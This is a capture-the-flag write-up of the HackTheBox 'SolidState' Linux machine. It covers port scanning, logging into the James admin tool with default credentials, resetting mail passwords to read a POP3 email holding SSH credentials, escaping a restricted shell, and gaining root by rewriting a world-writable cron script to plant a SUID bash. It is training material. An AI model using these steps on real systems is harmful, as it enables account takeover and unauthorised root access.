Summary

SolidState is an easy Linux box that can be exploited by identifying a peculiar remote port which is running the James Remote Administration tool, version 2.3.2 with default credentials. Through this tool, users were identified and passwords could be changed to authenticate with through pop3 on port 111. An email was retrieved that contained plaintext credentials which enabled an SSH shell. The privilege escalation was a result of a world-writeable python file that was modified to execute a bash script.


Discovery

Nmap discovered the following open ports and services:

nmap -sC -sV -oN fullscan -Pn 10.129.29.189

PORT    STATE SERVICE
22/tcp  open  ssh
25/tcp  open  smtp
80/tcp  open  http
110/tcp open  pop3
119/tcp open  nntp

The user was presented with the following page when navigating to HTTP:

The web application did not provide much interesting. Meanwhile, a new port was discovered with Nmap:

PORT     STATE SERVICE VERSION
4555/tcp open  rsip?

Netcat was used to get more information:

jeroen@kali:~$ nc 10.129.29.189 4555
JAMES Remote Administration Tool 2.3.2
Please enter your login and password
Login id:
root
Password:
root
Welcome root. HELP for a list of commands

This is a remote administration tool named James. The following command lists users:

listusers
Existing accounts 5
user: james
user: thomas
user: john
user: mindy
user: mailadmin

Exploitation

Searchsploit contained a publix RCE exploit for this tool. The following script was used: https://www.exploit-db.com/exploits/35513. As you can see in the script, it has the default credentials root:root that were already identified. The exploit creates a user with a specific command after which an existing user has to authenticate to execute the payload. However, for this to work you need to have someone logging into the system. Let’s change the password for all the users and see what happens. This is done like so:

setpassword thomas password
Password for thomas reset
setpassword john password
Password for john reset
setpassword mindy password
Password for mindy reset

Now go back to Pop3 on port 110 to list emails. Then to retrieve the emails:

telnet 10.129.29.189 110
Trying 10.129.29.189...
Connected to 10.129.29.189.
Escape character is '^]'.
user john
pass password
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready 
+OK
+OK Welcome john
list
+OK 1 743
1 743
.
retr 1
+OK Message follows
Return-Path: 
Message-ID: <9564574.1.1503422198108.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: john@localhost
Received: from 192.168.11.142 ([192.168.11.142])
          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
          for ;
          Tue, 22 Aug 2017 13:16:20 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:16:20 -0400 (EDT)
From: mailadmin@localhost
Subject: New Hires access
John, 

Can you please restrict mindy's access until she gets read on to the program. Also make sure that you send her a tempory password to login to her accounts.

Thank you in advance.

Respectfully,
James

Let’s authenticate as Mindy and retrieve her inbox:

retr 2
+OK Message follows
Return-Path: 
Message-ID: <16744123.2.1503422270399.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
          for ;
          Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
From: mailadmin@localhost
Subject: Your Access

Dear Mindy,


Here are your ssh credentials to access the system. Remember to reset your password after your first login. 
Your access is restricted at the moment, feel free to ask your supervisor to add any commands you need to your path. 

username: mindy
pass: P@55W0rd1!2@

Mindy’s credentials were discovered. These were tried with SSH and this was successful. You can now cat the user.txt file.


Privilege Escalation

It was found that this shell is restricted:

mindy@solidstate:~$ cd /tmp
-rbash: cd: restricted

However, this can be bypassed by appending the following option to the SSH command:

ssh mindy@10.129.29.189 "bash --noprofile"

Enumeration scripts were run and linpeas found some interesting writable files:

[+] Interesting writable files owned by me or writable by everyone (not in Home) (max 500)
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files
/dev/mqueue
/dev/shm
/home/mindy
/opt/tmp.py
/run/lock
/run/user/1001
/run/user/1001/gnupg
/run/user/1001/systemd
/run/user/1001/systemd/transient
/tmp
/tmp/.font-unix
/tmp/.ICE-unix
/tmp/linpeas.sh
/tmp/.Test-unix
/tmp/.X11-unix
/var/tmp

Each of these files were manually checked and /opt/tmp.py was interesting. The permissions of this file are as follows:

ls -la /opt/tmp.py
-rwxrwxrwx 1 root root 105 Aug 22  2017 /opt/tmp.py

It is owned by root but has world-writeable permissions so can be edited by any user. Let’s checkout the content:

cat /opt/tmp.py
#!/usr/bin/env python
import os
import sys
try:
os.system('rm -r /tmp/* ')
except:
sys.exit()

So, it seems to remove everything from /tmp. Let’s change the command and instead execute a bash script:

#!/usr/bin/env python
import os
import sys

try:
     os.system('bash /tmp/root.sh')
except:
     sys.exit()

The following bash script was created:

cat /tmp/root.sh 
cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash

After waiting a few mins a cronjob runs and a new file named rootbash appeared: The following command was executed:

${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ /tmp/rootbash -p
rootbash-4.4# whoami
root

Conclusion

This was a really fun box, enjoyed the process and learned how to enumerate Pop3 for emails. It was an easy box and the path was very straightforward. I hope you enjoyed this writeup!